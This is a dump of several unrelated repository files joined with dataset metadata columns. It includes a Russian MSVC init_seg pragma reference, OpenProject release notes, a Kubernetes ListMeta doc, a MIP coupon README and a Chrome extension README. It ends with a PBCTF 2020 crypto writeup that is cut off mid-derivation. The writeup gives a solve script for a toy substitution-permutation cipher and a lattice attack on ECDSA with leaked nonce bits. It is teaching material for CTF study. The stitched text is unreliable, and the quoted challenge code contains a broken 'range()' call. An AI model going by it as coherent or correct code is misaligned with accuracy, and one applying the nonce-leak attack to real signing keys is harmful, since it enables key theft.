] | null | null | null | docs/preprocessor/init-seg.md | kyser/cpp-docs.ru-ru | 085e0717cfcd00870d62803aed74a2d641034138 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/preprocessor/init-seg.md | kyser/cpp-docs.ru-ru | 085e0717cfcd00870d62803aed74a2d641034138 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: init_seg | Документы Microsoft
ms.custom: ''
ms.date: 11/04/2016
ms.technology:
- cpp-tools
ms.topic: reference
f1_keywords:
- vc-pragma.init_seg
- init_seg_CPP
dev_langs:
- C++
helpviewer_keywords:
- pragmas, init_seg
- init_seg pragma
- data segment initializing [C++]
ms.assetid: 40a5898a-5c85-4aa9-8d73-3d967eb13610
author: corob-msft
ms.author: corob
ms.workload:
- cplusplus
ms.openlocfilehash: f3be66fc2639253d1bbcfec21f544d5537e084e8
ms.sourcegitcommit: d55ac596ba8f908f5d91d228dc070dad31cb8360
ms.translationtype: MT
ms.contentlocale: ru-RU
ms.lasthandoff: 05/07/2018
---
# <a name="initseg"></a>init_seg
**Конкретных C++**
Определяет ключевое слово или раздел кода, влияющие на порядок выполнения кода запуска.
## <a name="syntax"></a>Синтаксис
```
#pragma init_seg({ compiler | lib | user | "section-name" [, func-name]} )
```
## <a name="remarks"></a>Примечания
Значение этих терминов *сегмент* и *раздел* являются взаимозаменяемыми в этом разделе.
Поскольку инициализация глобальных статических объектов может включать в себя исполняемый код, необходимо указать ключевое слово, определяющее, когда будут создаваться объекты. Это особенно важно использовать **init_seg** pragma в библиотеках динамической компоновки (DLL) и библиотеках, требующих инициализации.
Параметры для **init_seg** pragma являются:
**Компилятор**
Зарезервирован для инициализации библиотеки времени выполнения Microsoft C. Объекты в этой группе создаются первыми.
**lib**
Доступен для инициализаций поставщиков сторонних библиотек классов. Объекты в этой группе создаются после того, как отмечаются как **компилятора** , но перед любыми другими.
**Пользователь**
Доступен для любого пользователя. Объекты в этой группе создаются последними.
*Имя раздела*
Позволяет явно определить раздел инициализации. Объекты в указанном пользователем *имя раздела* создаются неявно; однако их адреса размещаются в разделе с *имя раздела*.
В разделе с указанным именем будут содержаться указатели на вспомогательные функции, которые будут создавать глобальные объекты, объявленные в данном модуле после прагма-директивы.
Список имен не следует использовать при создании раздела см. в разделе [/SECTION](../build/reference/section-specify-section-attributes.md).
*func имя*
Определяет функцию, вызываемую вместо функции `atexit` при выходе из программы. Эта вспомогательная функция также вызывает [atexit](../c-runtime-library/reference/atexit.md) с указателем на деструктор для глобального объекта. Если в прагма-директиве формы указывается идентификатор функции
```
int __cdecl myexit (void (__cdecl *pf)(void))
```
то вместо функции `atexit` библиотеки времени выполнения C будет вызываться пользовательская функция. Это позволяет создать список деструкторов, которые будет необходимо вызывать при готовности к уничтожению объектов.
Если требуется отложить инициализацию (например, в библиотеке DLL), можно явно указать имя раздела. Затем необходимо вызвать конструкторы для каждого статического объекта.
Идентификатор для замены функции `atexit` не заключается в кавычки.
Объекты по-прежнему будут размещаться в разделах, указанных другими прагма-директивами XXX_seg.
Объекты, объявленные в модуле, не будут автоматически инициализироваться средой выполнения C. Инициализацию потребуется выполнить самостоятельно.
По умолчанию разделы `init_seg` предназначены только для чтения. Если имя раздела — .CRT, компилятор автоматически изменит атрибут на атрибут только для чтения, даже если он отмечен как предназначенный для чтения и записи.
Нельзя указать **init_seg** более одного раза в записи преобразования.
Даже если объект не содержит определяемый пользователем конструктор и конструктор, явно не определенный в коде, компилятор может создать его (например, для привязки указателей на v-таблицу). Следовательно, конструктор, созданный компилятором, должен будет вызываться кодом.
## <a name="example"></a>Пример
```
// pragma_directive_init_seg.cpp
#include <stdio.h>
#pragma warning(disable : 4075)
typedef void (__cdecl *PF)(void);
int cxpf = 0; // number of destructors we need to call
PF pfx[200]; // pointers to destructors.
int myexit (PF pf) {
pfx[cxpf++] = pf;
return 0;
}
struct A {
A() { puts("A()"); }
~A() { puts("~A()"); }
};
// ctor & dtor called by CRT startup code
// because this is before the pragma init_seg
A aaaa;
// The order here is important.
// Section names must be 8 characters or less.
// The sections with the same name before the $
// are merged into one section. The order that
// they are merged is determined by sorting
// the characters after the $.
// InitSegStart and InitSegEnd are used to set
// boundaries so we can find the real functions
// that we need to call for initialization.
#pragma section(".mine$a", read)
__declspec(allocate(".mine$a")) const PF InitSegStart = (PF)1;
#pragma section(".mine$z",read)
__declspec(allocate(".mine$z")) const PF InitSegEnd = (PF)1;
// The comparison for 0 is important.
// For now, each section is 256 bytes. When they
// are merged, they are padded with zeros. You
// can't depend on the section being 256 bytes, but
// you can depend on it being padded with zeros.
void InitializeObjects () {
const PF *x = &InitSegStart;
for (++x ; x < &InitSegEnd ; ++x)
if (*x) (*x)();
}
void DestroyObjects () {
while (cxpf>0) {
--cxpf;
(pfx[cxpf])();
}
}
// by default, goes into a read only section
#pragma init_seg(".mine$m", myexit)
A bbbb;
A cccc;
int main () {
InitializeObjects();
DestroyObjects();
}
```
```Output
A()
A()
A()
~A()
~A()
~A()
```
## <a name="see-also"></a>См. также
[Директивы Pragma и ключевое слово __Pragma](../preprocessor/pragma-directives-and-the-pragma-keyword.md) | 36.160714 | 315 | 0.716872 | rus_Cyrl | 0.85493 |
9744312f9da780142792807acc285440764790bd | 743 | md | Markdown | docs/release-notes/4-1-4/README.md | bracikaa/openproject | 177a4d75345f70d0dab681058ac68acda8030e87 | [
"CC-BY-3.0"
] | 2 | 2018-04-03T07:09:57.000Z | 2021-08-05T08:38:47.000Z | docs/release-notes/4-1-4/README.md | bracikaa/openproject | 177a4d75345f70d0dab681058ac68acda8030e87 | [
"CC-BY-3.0"
] | 12 | 2015-07-17T11:59:25.000Z | 2021-02-01T13:20:31.000Z | docs/release-notes/4-1-4/README.md | bracikaa/openproject | 177a4d75345f70d0dab681058ac68acda8030e87 | [
"CC-BY-3.0"
] | 1 | 2021-09-09T05:38:03.000Z | 2021-09-09T05:38:03.000Z | ---
title: OpenProject 4.1.4
sidebar_navigation:
title: 4.1.4
release_version: 4.1.4
release_date: 2015-07-31
---
# OpenProject 4.1.4
OpenProject 4.1.4 contains a bug fix and a security fix.
The following bugs have been fixed:
- In projects with a lot of members and/or custom fields creating a
work package could lead to an internal error (500)
([\#21067](https://community.openproject.org/work_packages/21067)).
- In addition, a security bug has been fixed which potentially enabled
XSS attacks.
For further information on the release, please refer to the [Changelog
v.4.1.4](https://community.openproject.org/versions/755) or take a look
at [GitHub](https://github.com/opf/openproject/tree/v4.1.4).
| 25.62069 | 72 | 0.722746 | eng_Latn | 0.99076 |
97448c3273194b66dda2d91c874ee2c7e845c9df | 2,265 | md | Markdown | docs/V1ListMeta.md | ButterflyNetwork/argo-client-python | 00e50bb5eb6c64cfa76eb57c4a29a5fdd856611f | [
"Apache-2.0"
] | null | null | null | docs/V1ListMeta.md | ButterflyNetwork/argo-client-python | 00e50bb5eb6c64cfa76eb57c4a29a5fdd856611f | [
"Apache-2.0"
] | null | null | null | docs/V1ListMeta.md | ButterflyNetwork/argo-client-python | 00e50bb5eb6c64cfa76eb57c4a29a5fdd856611f | [
"Apache-2.0"
] | null | null | null | # V1ListMeta
## Properties
Name | Type | Description | Notes
------------ | ------------- | ------------- | -------------
**_continue** | **str** | continue may be set if the user set a limit on the number of items returned, and indicates that the server has more data available. The value is opaque and may be used to issue another request to the endpoint that served this list to retrieve the next set of available objects. Continuing a consistent list may not be possible if the server configuration has changed or more than a few minutes have passed. The resourceVersion field returned when using this continue value will be identical to the value in the first response, unless you have received this token from an error message. | [optional]
**remaining_item_count** | **int** | remainingItemCount is the number of subsequent items in the list which are not included in this list response. If the list request contained label or field selectors, then the number of remaining items is unknown and the field will be left unset and omitted during serialization. If the list is complete (either because it is not chunking or because this is the last chunk), then there are no more remaining items and this field will be left unset and omitted during serialization. Servers older than v1.15 do not set this field. The intended use of the remainingItemCount is *estimating* the size of a collection. Clients should not rely on the remainingItemCount to be set or to be exact. This field is alpha and can be changed or removed without notice. | [optional]
**resource_version** | **str** | String that identifies the server's internal version of this object that can be used by clients to determine when objects have changed. Value must be treated as opaque by clients and passed unmodified back to the server. Populated by the system. Read-only. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#concurrency-control-and-consistency | [optional]
**self_link** | **str** | selfLink is a URL representing this object. Populated by the system. Read-only. | [optional]
[[Back to Model list]](../README.md#documentation-for-models) [[Back to API list]](../README.md#documentation-for-api-endpoints) [[Back to README]](../README.md)
| 161.785714 | 808 | 0.757616 | eng_Latn | 0.999461 |
9744a66812505d69f8e7c18211ad6d7e4b8672e8 | 31 | md | Markdown | README.md | AndrejHafner/tetris-reinforcement-learning | 52db5d8ce7f9162b15575456a0effc69dd7fb2bf | [
"MIT"
] | null | null | null | README.md | AndrejHafner/tetris-reinforcement-learning | 52db5d8ce7f9162b15575456a0effc69dd7fb2bf | [
"MIT"
] | null | null | null | README.md | AndrejHafner/tetris-reinforcement-learning | 52db5d8ce7f9162b15575456a0effc69dd7fb2bf | [
"MIT"
] | null | null | null | # tetris-reinforcement-learning | 31 | 31 | 0.870968 | eng_Latn | 0.643031 |
9744bd3716108cc67d9a4fa2f3fd1e088ff95903 | 1,027 | md | Markdown | mip-zmall-coupon/README.md | wupengFEX/mip-extensions-platform | 6bd9e52b44bf62875383b71cb36411c09b86f884 | [
"MIT"
] | 1 | 2019-02-25T11:06:08.000Z | 2019-02-25T11:06:08.000Z | mip-zmall-coupon/README.md | izzhip/mip-extensions-platform | d84c2297d6b3ced1d4cd4415ba6df03dad251609 | [
"MIT"
] | null | null | null | mip-zmall-coupon/README.md | izzhip/mip-extensions-platform | d84c2297d6b3ced1d4cd4415ba6df03dad251609 | [
"MIT"
] | 1 | 2018-08-20T06:40:04.000Z | 2018-08-20T06:40:04.000Z | # mip-zmall-coupon
领取优惠劵 预约到店
标题|内容
----|----
类型|业务组件
支持布局|responsive,fixed-height,fill,container,fixed
所需脚本|https://c.mipcdn.com/static/v1/mip-zmall-coupon/mip-zmall-coupon.js
## 最新版本
### 1.1.3
- 增加防止点击过快的限制
### 1.1.0
- 改为独立层弹出,主要解决因 不能自己写fixed元素,而用mip-fixed导致的问题,实现逻辑变了
### 1.0.4
- 修改样式
### 1.0.3
- 修改提示语
- 修改样式
### 1.0.2
- 修改查看路线的链接
### 1.0.1
- 增加部分注释
- 更改获取 `userId` 为 获取 `sid`
- 把 `alert` 改成 `toast`
## 示例
### 基本用法
```html
<mip-zmall-coupon data-url="//path/to/api" data-merchant-id="" data-store-id="" data-trigger="click:coupon.show" data-target="coupon">
<mip-fixed type="top" zmall-fixed-id="coupon" class="mip-zmall-coupon-fixed"></mip-fixed>
</mip-zmall-coupon>
<div on="click:coupon.show">优惠到店</div>
```
## 属性
### data-url
说明:一键领取接口地址
必选项:是
类型:String
默认值:""
### data-trigger
说明:触发优惠券层的按钮
必选项:是
类型:String
默认值:""
### data-target
说明:被挪到下面的fixed的对应值
必选项:是
类型:String
默认值:""
## 注意事项
- 组件内部Dom结构及属性名称不能自定义
| 13.693333 | 134 | 0.600779 | yue_Hant | 0.13426 |
9744f66e4f9f2b38131a5af93c9fb31bb7f93091 | 872 | md | Markdown | Readme.md | stevenmiller888/chrome-helpers | 77d841a0d295c071eb275d7ddcc491683ebefb47 | [
"MIT"
] | null | null | null | Readme.md | stevenmiller888/chrome-helpers | 77d841a0d295c071eb275d7ddcc491683ebefb47 | [
"MIT"
] | null | null | null | Readme.md | stevenmiller888/chrome-helpers | 77d841a0d295c071eb275d7ddcc491683ebefb47 | [
"MIT"
] | null | null | null |
# Extension Helpers
> A nicer way to work with chrome extension API methods.
## Examples
```js
var helpers = require('stevenmiller888/extension-helpers');
helpers.inject('index.js');
helpers.setIcon('images/icon.png');
helpers.changeUrl('https://www.github.com');
```
## API
### .onMessage(fn)
When a message is received, execute a callback.
### .getCurrentTab(fn)
Get the current tab and execute a callback with the current tab passed in
### .inject(name, id)
Inject a content script.
### .onIconClicked(fn)
Execute a callback when the icon is clicked.
### .onTabUpdated(fn)
When the tab is updated and the status is complete, execute a callback with the tabId passed in.
### .setIcon(path)
Set the icon.
### .onAddressBarChanged(fn)
When the address bar is changed, execute a callback
### .changeUrl(url)
Change the current tab url
## License
MIT
| 16.769231 | 96 | 0.719037 | eng_Latn | 0.951242 |
9746b4b0c6537be318532a5a5863a7ed013ce703 | 40,456 | md | Markdown | _posts/2020-12-7-pbctf2020.md | S3v3ru5/S3v3ru5.github.io | c40ee77a722b1a9ca3ce669a3b692b141d1c19ff | [
"MIT"
] | 2 | 2020-08-11T19:01:45.000Z | 2021-07-03T17:36:04.000Z | _posts/2020-12-7-pbctf2020.md | S3v3ru5/S3v3ru5.github.io | c40ee77a722b1a9ca3ce669a3b692b141d1c19ff | [
"MIT"
] | null | null | null | _posts/2020-12-7-pbctf2020.md | S3v3ru5/S3v3ru5.github.io | c40ee77a722b1a9ca3ce669a3b692b141d1c19ff | [
"MIT"
] | 1 | 2020-09-14T10:38:55.000Z | 2020-09-14T10:38:55.000Z | ---
title: PBCTF 2020 Writeups
updated: 2020-12-7
tags: [crypto, writeup]
---
# PBCTF 2020 Writeups
- Crypto
- [Queensarah2](#queensarah2)
- [LeaK](#leak)
- [Special Gift and Special Gift Revenge](#specialgift)
---
I have participated in PBCTF 2020 as a member of zer0pts and We won the CTF 🥳 <br>
# <a name="queensarah2"></a> Queensarah2
challenge.py
```python
#!/usr/bin/env python3
from string import ascii_lowercase
from itertools import product
from random import SystemRandom
from math import ceil, log
from secretstuff import FLAG
random = SystemRandom()
ALPHABET = ascii_lowercase + "_"
assert all(char in ALPHABET for char in FLAG)
bigrams = [''.join(bigram) for bigram in product(ALPHABET, repeat=2)]
random.shuffle(bigrams)
S_box = {}
for i in range(len(ALPHABET)):
for j in range(len(ALPHABET)):
S_box[ALPHABET[i]+ALPHABET[j]] = bigrams[i*len(ALPHABET) + j]
# map bigrams -> random.shuffle(bigrams)
assert len(set(S_box.keys())) == 27*27
def encrypt(message):
if len(message) % 2:
message += "_"
message = list(message)
rounds = int(2 * ceil(log(len(message), 2))) # The most secure amount of rounds
for round in range(rounds):
# Encrypt
for i in range(0, len(message), 2):
message[i:i+2] = S_box[''.join(message[i:i+2])]
# Shuffle, but not in the final round
if round < (rounds-1):
message = [message[i] for i in range(len(message)) if i%2 == 0] + [message[i] for i in range(len(message)) if i%2 == 1]
return ''.join(message)
if __name__ == "__main__":
print("This is a restricted service! Decrypt this password to proceed:")
print({encrypt(FLAG)})
for _ in range(1500):
question = input("> ").strip()
assert 0 < len(question) <= 10000
if not question:
print("Bye.")
break
elif question == FLAG:
print(f"You got it. The flag is pbctf{% raw %}{{{FLAG}}}{% endraw %} ")
break
else:
print("That's not quite right. Your password encrypts to this:")
print(encrypt(question))
```
Challenge implements an encryption function and gives us the flag encrypted with it at the start of the connection.
We can request the server for the encryption of plaintexts for 1500 times.
encryption function is substitution followed by permutation for n rounds.n depends on the plaintext length.
We know the permutation used and knowledge of the substitution box would suffice to write a decryption routine, eventually get the flag :)
Let S represent the substitution which basically maps a bigram to bigram and is bijective.
Because of the permutation used in the encryption function, encryption of a bigram ($$i$$) is equal to $$S(S(i))$$.
Let's consider an small $$S$$ to understand how we can use this information ($$i$$, $$S(S(i))$$) to recover $$S$$.
```python
S = {0: 1, 1: 2, 2: 3, 3: 0, 4: 5, 5: 4, 6: 6, 7: 8, 8: 9, 9: 7}
```
if we consider $$S$$ as Permutation Group then mapping $$i$$ to $$S(S(i))$$ is $$S^{2}$$
<center>
$$S = \begin{pmatrix}
0&1&2&3&4&5&6&7&8&9 \\
1&2&3&0&5&4&6&8&9&7
\end{pmatrix} = (0\ 1\ 2\ 3)(4\ 5)(6)(7\ 8\ 9)$$
</center>
and
<center>
$$S^{2} = \begin{pmatrix}
0&1&2&3&4&5&6&7&8&9 \\
2&3&0&1&4&5&6&9&7&8
\end{pmatrix} = (0\ 2)(1\ 3)(4)(5)(6)(7\ 9\ 8)$$
</center>
consider a cycle with odd length from $$S$$ : $$(7\ 8\ 9)$$
<center>
$$S(S(7)) = 9,\ \ S(S(9)) = 8,\ \ S(S(8)) = 7$$
</center>
The resulting elements form a cycle of $$S^{2}$$ : $$(7\ 9\ 8)$$
Now, considering a cycle of even length : $$(0\ 1\ 2\ 3)$$
<center>
$$S(S(0)) = 2,\ \ S(S(2)) = 0,\ \ S(S(1)) = 3,\ \ S(S(3)) = 1$$
</center>
similarly, resulting elements form cycles of $$S^{2}$$: $$(0\ 2)$$, $$(1\ 3)$$
It's quite easy to observe that
- Every even length cycle in $$S$$ will break into 2 equal size cycles in $$S^{2}$$.
- Every even length cycle in $$S^{2}$$ is part of bigger cycle(double it's length) in $$S$$
- Every odd length cycle in $$S$$ will have a cycle with the same length and same elements but with different order in $$S^{2}$$
After extracting $$S^{2}$$ from server, we can use above rules to recover most part of the $$S$$.<br>
A little bruteforce is needed for combining cycles<br>
consider above example, combining $$(0\ 2),\ \ (1\ 3)$$ could result in $$(0\ 1\ 2\ 3)$$ or $$(0\ 3\ 2\ 1)$$
after calculating $$S$$, it's straightforward to decrypt the flag ciphertext.
FLAG :: pbctf{slide_attack_still_relevant_for_home_rolled_crypto_systems}
```python
{% raw %}
#!/usr/bin/env python3
import ast
from string import ascii_lowercase
from itertools import product
from math import ceil, log
def construct_cycles(sbox):
# construct cyclic representation of sbox permutation
bigrams = list(sbox.keys())
cycles = []
while len(bigrams) > 0:
current = []
i = bigrams[0]
while i not in current:
current.append(i)
i = sbox[i]
bigrams.remove(i)
cycles.append(current)
return cycles
def construct_single_cycle(double_cycle):
"""
ex:
double_cycle - (1 3 5 7 2 4 6)
single_cycle - (1 2 3 4 5 6 7)
"""
assert len(double_cycle) % 2 == 1
single_cycle = [None] * len(double_cycle)
i = 0
j = 0
while None in single_cycle:
single_cycle[i] = double_cycle[j]
i = (i + 2) % len(double_cycle)
j = (j + 1)
return single_cycle
def combine_double_cycles(c1, c2):
"""
join 2 double cycles
ex:
double_cycle_1 = (1 3 5)
double_cycle_2 = (2 4 6)
res --> (1 2 3 4 5 6)
"""
single_cycle = [None] * (len(c1)*2)
assert len(c1) == len(c2)
j = 0
for i in range(0, len(single_cycle), 2):
single_cycle[i] = c1[j]
single_cycle[i + 1] = c2[j]
j += 1
return single_cycle
def construct_sbox(cycles):
"""
convert cyclic representation of a permutation to
a mapping
"""
sbox = {}
for cur in cycles:
# print(cur)
for i in range(len(cur)):
sbox[cur[i]] = cur[(i + 1) % len(cur)]
return sbox
def encrypt(S_box, message):
if len(message) % 2:
message += "_"
message = list(message)
rounds = int(2 * ceil(log(len(message), 2))) # The most secure amount of rounds
for round in range(rounds):
# Encrypt
for i in range(0, len(message), 2):
message[i:i+2] = S_box[''.join(message[i:i+2])]
# Shuffle, but not in the final round
if round < (rounds-1):
message = [message[i] for i in range(len(message)) if i%2 == 0] + [message[i] for i in range(len(message)) if i%2 == 1]
return ''.join(message)
def decrypt(S_box, ct):
S_box = reverse_sbox(S_box)
ct = list(ct)
rounds = int(2 * ceil(log(len(ct), 2)))
for round in range(rounds):
for i in range(0, len(ct), 2):
ct[i:i+2] = S_box[''.join(ct[i:i+2])]
if round < (rounds-1):
nct = [None] * len(ct)
for i in range(len(ct) // 2):
nct[i*2] = ct[i]
nct[i*2 + 1] = ct[i + (len(ct)//2)]
ct = nct
return ''.join(ct)
def reverse_sbox(sbox):
rev_sbox = {}
for i in sbox:
rev_sbox[sbox[i]] = i
return rev_sbox
def check_sbox(sbox, pt_ct):
for pt in pt_ct:
cti = encrypt(sbox, pt)
if not cti == pt_ct[pt]:
return False
return True
"""
Note: the below part of the program contains hardcoded values
calculated using the data collected.
I haven't wrote a general version(yet)
"""
with open("tmp_output", "r") as f:
data = f.read()
data = ast.literal_eval(data)
# data collected from the server
flag_ct, double_sbox, tmp_cts = data
flag_ct = flag_ct.strip()[2:-2]
tmp_pts = ["a" * 8, "b" * 8, "c" * 8]
# to validate generated sboxs
pt_ct_pairs = {}
for pt, ct in zip(tmp_pts, tmp_cts):
pt_ct_pairs[pt] = ct
# convert double sbox (S_box[S_box[i]]) to cyclic representation
cycles = construct_cycles(double_sbox)
print("cycle lengths = ", [len(i) for i in cycles])
cycle_lengths = [len(i) for i in cycles]
# known_encs = []
# single_cycles contain cycles of odd length in original S_box
single_cycles = []
remaining_cycles = []
for cycle in cycles:
if cycle_lengths.count(len(cycle)) == 1:
single_cycles.append(construct_single_cycle(cycle))
else:
remaining_cycles.append(cycle)
print("remaining_cycle_lengths = ", [len(i) for i in remaining_cycles])
cycles_258 = [i for i in remaining_cycles if len(i) == 258]
cycles_6 = [i for i in remaining_cycles if len(i) == 6]
cycles_1 = [i for i in remaining_cycles if len(i) == 1]
possible_flags = []
for i1 in range(258):
t1_single_cycles = single_cycles[::]
s_c258 = combine_double_cycles(cycles_258[0], cycles_258[1][i1:] + cycles_258[1][:i1])
t1_single_cycles.append(s_c258)
for i2 in range(6):
s_c6 = combine_double_cycles(cycles_6[0], cycles_6[1][i2:] + cycles_6[1][:i2])
t2_single_cycles = t1_single_cycles + [s_c6]
combs = [(0, 1, 2), (1, 2, 0), (0, 2, 1)]
# bruteforce cycles one of size 2 and another of 1
for comb in combs:
final_single_cycles = [combine_double_cycles(cycles_1[comb[0]], cycles_1[comb[1]])]
final_single_cycles += t2_single_cycles
final_single_cycles += [cycles_1[comb[2]]]
t_sbox = construct_sbox(final_single_cycles)
if check_sbox(t_sbox, pt_ct_pairs):
print("decrypted_flag =", decrypt(t_sbox, flag_ct))
possible_flags.append(decrypt(t_sbox, flag_ct))
# check for cycles of size 1 each
final_single_cycles = [bigram for bigram in cycles_1]
final_single_cycles += t2_single_cycles
t_sbox = construct_sbox(final_single_cycles)
if check_sbox(t_sbox, pt_ct_pairs):
print("decrypted_flag = ", decrypt(t_sbox, flag_ct))
possible_flags.append(decrypt(t_sbox, flag_ct))
print("possible flags\n")
for flag in possible_flags:
print("pbctf{{{}}}".format(flag))
"""
cycle lengths = [81, 258, 258, 117, 6, 6, 1, 1, 1]
remaining_cycle_lengths = [258, 258, 6, 6, 1, 1, 1]
decrypted_flag = slide_attack_stihclcelevant_for_home_rolled_crypto_systems
decrypted_flag = slide_attack_stiptqcgnqbeot_for_home_rolled_crypto_systems
decrypted_flag = slide_attack_stillineaxozqt_for_home_rolled_crypto_systems
decrypted_flag = slide_attack_still_relevant_for_home_rolled_crypto_systems
possible flags
pbctf{slide_attack_stihclcelevant_for_home_rolled_crypto_systems}
pbctf{slide_attack_stiptqcgnqbeot_for_home_rolled_crypto_systems}
pbctf{slide_attack_stillineaxozqt_for_home_rolled_crypto_systems}
pbctf{slide_attack_still_relevant_for_home_rolled_crypto_systems}
"""
# FLAG :: pbctf{slide_attack_still_relevant_for_home_rolled_crypto_systems}
{% endraw %}
```
---
# <a name="leak"></a> LeaK
challenge.py
```python
#!/usr/bin/env python3
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad
from ecdsa import SECP256k1
from ecdsa.ecdsa import Public_key, Private_key
import hashlib
import random
g = SECP256k1.generator
order = int(SECP256k1.order)
secret = random.randrange(2, order - 1)
pubkey = Public_key(g, g * secret)
privkey = Private_key(pubkey, secret)
arr = []
for i in range():
h = random.randrange(2, order - 1)
k = random.randrange(2, order - 1)
sig = privkey.sign(h, k)
print(k)
lea_k = int("0x" + "{:064x}".format(k)[10:-10], 16)
arr.append((h, lea_k, int(sig.r), int(sig.s)))
sha256 = hashlib.sha256()
sha256.update(str(secret).encode())
key = sha256.digest()
aes = AES.new(key, mode=AES.MODE_ECB)
print(aes.encrypt(pad(flag, 16)).hex())
```
This is a classic(kind of) challenge based on leaked nonces of ecdsa.
We were given 30 signatures along with the consecutive middle bits of the corresponding nonce used in signing process.
Similar to most challenges based on leaked nonces, this could be solved by finding paper discussing this problem and implementing algorthim given in that.
It's quite easy to find such paper. <br>
paper "A Tale of Three Signatures: Practical Attack of ECDSA with wNAF" ([link](https://link.springer.com/chapter/10.1007/978-3-030-51938-4_18)) worked for me.<br>
Though linking solution code would suffice, I'm gonna take a chance and try to explain my take on the solution.for that I will pretend like I haven't read the paper for a moment.
Let $$q$$ be a prime number and $$\ \alpha, k, r, s, h\ \in \ \mathbb{Z}/q\mathbb{Z}$$.
ECDSA signature is calculated as
<center>
$$s = k^{-1}(h + r\alpha)\ \ \ \ (mod\ q)$$
</center>
where $$(r, s)$$ is the signature, $$k$$ is the nonce, $$h$$ is hash of the message and $$\alpha$$ is the private exponent.
<center>
$$r\alpha = sk - h\ \ \ \ (mod\ q)$$
</center>
let
<center>
$$k = d_{1} + a + bd_{2} \tag{eq 1}$$
</center>
implies
<center>
$$r\alpha = s(d_{1} + a + bd_{2}) - h\ \ \ \ \ (mod\ q)$$
</center>
<center>
$$r\alpha - sd_{1} - sbd_{2} - (sa - h) = 0\ \ \ \ \ (mod\ q)$$
</center>
<!-- <center>
$$r\alpha = sd1 + sd2 + (sa - h)\ \ \ (mod\ q)$$
</center> -->
Let Equation $$E_{i}$$ be
<center>
$$r_{i}\alpha - s_{i}d_{i1} - s_{i}b_{i}d_{i2} - (s_{i}a_{i} - h_{i}) = 0\ \ \ \ \ (mod\ q)$$
</center>
let $$u$$ be the number of signatures avaliable<br><br>
for $$2\leq i \leq u$$ consider $$r_{1}E_{i} - r_{i}E_{1}$$
<center>
$$-r_{1}s_{i}d_{i1} - r_{1}s_{i}b_{i}d_{i2} - r_{1}(s_{i}a_{i} - h_{i}) + r_{i}s_{1}d_{11} + r_{i}s_{1}b_{1}d_{12} + r_{i}(s_{1}a_{1} - h_{i}) = 0\ \ \ \ \ (mod\ q)$$
</center>
<center>
$$r_{i}s_{1}d_{11} + r_{i}s_{1}b_{1}d_{12} + (-r_{1}s_{i})d_{i1} + (-r_{1}s_{i}b_{i})d_{i2} - (r_{1}(s_{i}a_{i} - h_{i}) - r_{i}(s_{1}a_{1} - h_{i})) = 0\ \ \ \ \ (mod\ q)$$
</center>
<br>
for $$2\leq i \leq u$$ let $$\tau_{i1} = r_{i}s_{1},\ \tau_{i2} = r_{i}s_{1}b_{1},\ \sigma_{i1} = -r_{1}s_{i},\ \sigma_{i2} = -r_{1}s_{i}b_{i},\ \gamma = r_{1}(s_{i}a_{i} - h_{i}) - r_{i}(s_{1}a_{1} - h_{i})$$
Above equation can be written as<br>
<center>
$$\tau_{i1}d_{11} + \tau_{i2}d_{12} + \sigma_{i1}d_{i1} + \sigma_{i1}d_{i2} - \gamma_{i} = 0\ \ \ \ \ (mod\ q),\ \ \ 2\leq i \leq u \tag{eq 2}$$
</center>
<br>
for this challenge $$q, \alpha, k, s, h, r$$ are of size 256 bits each and total of $$u = 30$$ signatures are given.<br>
for each signature middle(40-256) bits of k are given.<br>
<center>
$$k = d_{i1} + 2^{40}leak_{i} + 2^{256-40}d_{i2}$$
</center>
we don't know the values of $$d_{i1}, d_{i2}$$, knowing them would allow us to calculate $$k$$ and ultimately calculate secret exponent $$\alpha$$.<br>
let $$\mu_{ij}$$ be the bit length of $$d_{ij}$$ and $$m = \max_{ij}\mu_{ij}$$,
In our case $$\mu_{ij} = 40$$ and $$m = 40$$<br>
with each signature, $$a_{i} = 2^{40}leak_{i}, b_{i} = 2^{256-40}$$ we could derive equations of form $$(eq\ 2)$$
<center>
$$\tau_{i1}d_{11} + \tau_{i2}d_{12} + \sigma_{i1}d_{i1} + \sigma_{i1}d_{i2} - \gamma_{i} = 0\ \ \ \ \ (mod\ q),\ \ \ 2\leq i \leq u$$
</center>
<center>
$$\tau_{i1}d_{11} + \tau_{i2}d_{12} + \sigma_{i1}d_{i1} + \sigma_{i1}d_{i2} - \gamma_{i} - t_{i}q = 0\ \ \ \ \ \ \ \ \ \ \ \ \ 2\leq i \leq u$$
</center>
Now, we have collection of equations with "small" unknowns result in "small" value (not just small but $$0$$).LLL works great with this type of linear equations.<br>
so, we have to construct a Basis $$B$$ and hope that LLL(treat this as a black box) finds a short vector in the lattice generated by $$B$$ which contains information about unknowns.<br><br>
It's upto to us to construct such Basis $$B$$ which contains a short vector and statisfies certain bounds so that LLL could find it.<br><br>
Every vector in a lattice is linear combination of basis vectors which we represent as row vectors in matrix $$B$$.<br>
So, let's try to build a matrix $$A$$ using the equations so that linear combinations of row vectors will result in rhs of them.
(linear combination of row vectors is nothing but left multiplication of $$A$$ i.e $$xA$$)
<center>
$$\tau_{i1}d_{11} + \tau_{i2}d_{12} + \sigma_{i1}d_{i1} + \sigma_{i1}d_{i2} - \gamma_{i} - t_{i}q = 0\ \ \ \ \ \ \ \ \ \ \ \ \ 2\leq i \leq u$$
</center>
each equation corresponds to a column in $$A$$ and we want $$x\ in\ xA$$ to have unknows as entries.<br>
-- each coefficient of $$q$$ $$(-t_{i})$$ are different. so, a $$q$$ goes into a new row for each equation<br>
-- coefficient of $$\tau_{i1}$$ are all $$d_{11}$$. $$\tau_{i1}, 2\leq i\leq u$$
go into same row<br>
-- similarly $$\tau_{i2}, 2\leq i\leq u$$ go into same row<br>
-- coefficient of $$\sigma_{i1}$$ and $$\sigma_{i2}$$ are different.so, each go into a new row <br>
$$A$$ would be <br>
<center>
$$A = \begin{bmatrix}
q&0&\cdots&0 \\
0&q&\cdots&0 \\
& &\ddots& \\
0&0&\cdots&q \\
\tau_{21}&\tau_{31}&\cdots&\tau_{u1} \\
\tau_{22}&\tau_{32}&\cdots&\tau_{u2} \\
\sigma_{21}&0&\cdots&0 \\
\sigma_{22}&0&\cdots&0 \\
0&\sigma_{31}&\cdots&0 \\
0&\sigma_{32}&\cdots&0 \\
& &\ddots& \\
0&0&\cdots&\sigma_{u1} \\
0&0&\cdots&\sigma_{u2} \\
\gamma_{2}&\gamma_{3}&\cdots&\gamma_{u}
\end{bmatrix}$$
</center>
